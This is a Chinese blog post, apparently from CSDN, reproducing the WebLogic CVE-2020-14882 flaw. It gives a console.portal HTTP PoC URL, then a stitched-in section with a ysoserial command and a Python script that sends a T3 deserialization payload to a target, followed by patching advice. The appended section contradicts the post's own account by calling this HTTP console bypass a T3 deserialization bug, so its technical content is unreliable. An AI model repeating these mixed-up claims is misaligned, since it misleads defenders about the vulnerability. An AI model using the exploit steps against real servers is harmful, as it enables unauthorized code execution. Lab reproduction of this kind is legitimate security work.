CVE-2020-14882 weblogic 未授权命令执行复现及分析

本文探讨了WebLogic 12中一个未经授权的漏洞,攻击者可通过HTTP利用宽字节安全实现远程代码执行。环境为Windows Server 2012搭配WebLogic 12,通过POC展示了如何在console端执行shell命令。安全提示与修复建议值得关注。

简介

该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

 

环境搭建

 

windows server 2012

weblogic 12

通过宽字节安全的分析来看(调试源码):

 

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")

 

 

根据其给出的POC

### CVE-2020-14882 漏洞复现步骤及利用方法 CVE-2020-14882 是 Oracle WebLogic Server 中的一个远程代码执行漏洞,攻击者可以在无需认证的情况下通过 T3 协议发送恶意请求,触发反序列化漏洞并执行任意代码。该漏洞影响多个版本的 WebLogic Server,包括 10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4 和 14.1.1.0 等版本[^5]。 #### 漏洞复现环境准备 为了复现此漏洞,建议使用 Vulhub 或手动搭建 WebLogic Server 环境。以下是基于 Vulhub 的部署步骤: 1. 安装 Docker 和 Docker Compose。 2. 克隆 Vulhub 项目,并切换到 CVE-2020-14882 漏洞目录: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2020-14882 ``` 3. 启动容器: ```bash docker-compose up -d ``` 此时 WebLogic 服务将在 `http://your-ip:7001` 上运行[^5]。 #### 漏洞检测与验证 可通过以下方式确认目标是否受影响: - 使用 Nmap 进行指纹识别,判断是否运行了 WebLogic 并监听 T3 端口(默认为 7001)。 - 利用 ysoserial 工具生成恶意 payload,并尝试通过 T3 协议连接进行反序列化测试。 #### 漏洞利用步骤 1. **生成恶意 payload** 使用 ysoserial 构建反序列化载荷,例如使用 CommonsCollections6 链执行命令: ```bash java -jar ysoserial.jar CommonsCollections6 "calc.exe" > payload.bin ``` 2. **发送 payload** 利用 T3 协议向目标服务器发送恶意序列化对象。可借助 Python 脚本实现: ```python import socket import sys def send_exploit(ip, port, file_path): with open(file_path, 'rb') as f: payload = f.read() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) # 发送 T3 协议头部 sock.send(b't3 11.1.0\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\ndata:\n\x00\x00\x00\x80') # 发送 payload sock.send(payload) sock.close() if __name__ == '__main__': ip = sys.argv[1] port = int(sys.argv[2]) file_path = sys.argv[3] send_exploit(ip, port, file_path) ``` 执行脚本: ```bash python exploit.py your-ip 7001 payload.bin ``` 若目标未打补丁,将弹出计算器窗口[^5]。 #### 漏洞修复建议 Oracle 在 2020 年 10 月发布的 CPU(Critical Patch Update)中修复了该漏洞。建议采取以下措施: - 及时升级至受支持的 WebLogic 版本并应用最新补丁。 - 如果无法立即升级,可在防火墙或负载均衡设备上限制对 T3 端口的访问,仅允许可信 IP 访问。 - 修改默认管理控制台路径,增强访问控制策略以减少攻击面[^4]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值